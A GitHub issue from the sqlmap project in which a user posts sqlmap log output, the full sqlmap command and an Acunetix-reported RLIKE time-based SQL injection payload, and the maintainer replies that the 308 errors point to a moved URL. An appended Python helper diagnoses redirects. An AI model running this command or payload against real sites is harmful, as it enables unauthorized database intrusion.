sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

308 #4685

Closed iunass closed 3 years ago

iunass commented 3 years ago

[02:40:40] [INFO] parsing HTTP request from 'inje'
[02:40:40] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[02:40:41] [WARNING] it appears that you have provided tainted parameter values ('a=paidout'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[02:40:47] [INFO] flushing session file
[02:40:47] [INFO] testing connection to the target URL
[02:40:48] [WARNING] the web server responded with an HTTP error code (308) which could interfere with the results of the tests
[02:40:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:40:49] [WARNING] heuristic (basic) test shows that POST parameter 'a' might not be injectable
[02:40:49] [INFO] testing for SQL injection on POST parameter 'a'
[02:40:49] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:40:49] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[02:41:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[02:41:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:41:37] [INFO] POST parameter 'a' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' injectable
[02:41:37] [INFO] checking if the injection point on POST parameter 'a' is a false positive
[02:41:37] [WARNING] false positive or unexploitable injection point detected
[02:41:37] [WARNING] POST parameter 'a' does not seem to be injectable
[02:41:38] [WARNING] heuristic (basic) test shows that GET parameter 'a' might not be injectable
[02:41:40] [INFO] testing for SQL injection on GET parameter 'a'
[02:41:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:42:03] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[02:42:10] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:42:21] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[02:42:40] [WARNING] GET parameter 'a' does not seem to be injectable
[02:42:40] [CRITICAL] all tested parameters do not appear to be injectable. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[02:42:40] [WARNING] HTTP error codes detected during run: 308 (Permanent Redirect) - 335 times

sqlmap -r inje --flush-session --random-agent --level 5 --risk 3 --technique=T --time-sec=2 -p a --test-filter=RLIKE

P.S.: I tried other techniques/tamper ... Acunetix throws: URL encoded GET input a was set to paidout' RLIKE (SELECT (CASE WHEN (1+1-2+00076=2+2-4+00076) THEN 1 ELSE 0x28 END)) -- Please help 🥺

stamparm commented 3 years ago

308 (Permanent Redirect) means that you are most probably targeting a URL which has been moved (permanently). Something is different in the URL you are trying to use and the one expected by the target (e.g. different path or something). Try to access it via a browser to see what's going on.
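
As an added illustration of the reply above (not part of the thread and not sqlmap code): a small Python helper that compares a requested URL with the `Location` header of a redirect response and reports which component differs. The function name, the sample URLs and the `example.test` host are constructed for this example.

```python
from urllib.parse import urljoin, urlsplit

# Redirect status codes. 307/308 require the client to repeat the same
# method and body; 301/302/303 are commonly retried as GET.
REDIRECTS = {301: False, 302: False, 303: False, 307: True, 308: True}


def explain_redirect(requested_url, status, location):
    """Report which URL components differ between the requested URL and
    the redirect target (hypothetical helper, not part of sqlmap)."""
    if status not in REDIRECTS:
        raise ValueError("not a redirect status: %d" % status)
    # Location may be relative, so resolve it against the requested URL.
    target = urljoin(requested_url, location)
    old, new = urlsplit(requested_url), urlsplit(target)
    changed = []
    if old.scheme != new.scheme:
        changed.append("scheme")
    if old.hostname != new.hostname or old.port != new.port:
        changed.append("host")
    if old.path != new.path:
        # Distinguish a trailing-slash-only change from a real path change.
        if old.path.rstrip("/") == new.path.rstrip("/"):
            changed.append("trailing-slash")
        else:
            changed.append("path")
    if old.query != new.query:
        changed.append("query")
    return {
        "target": target,
        "changed": changed,
        "method_preserved": REDIRECTS[status],
    }


# Constructed sample responses (example.test is a placeholder host).
SAMPLES = [
    ("http://example.test/status?a=paidout", 308, "https://example.test/status?a=paidout"),
    ("https://example.test/status?a=paidout", 308, "/status/?a=paidout"),
    ("https://example.test/old?a=paidout", 301, "https://www.example.test/new"),
]

if __name__ == "__main__":
    for url, status, location in SAMPLES:
        print(status, url, "->", explain_redirect(url, status, location))
```

If `changed` is empty, the server is redirecting to the same URL, which points at something other than the URL itself (for example a header or cookie the server expects).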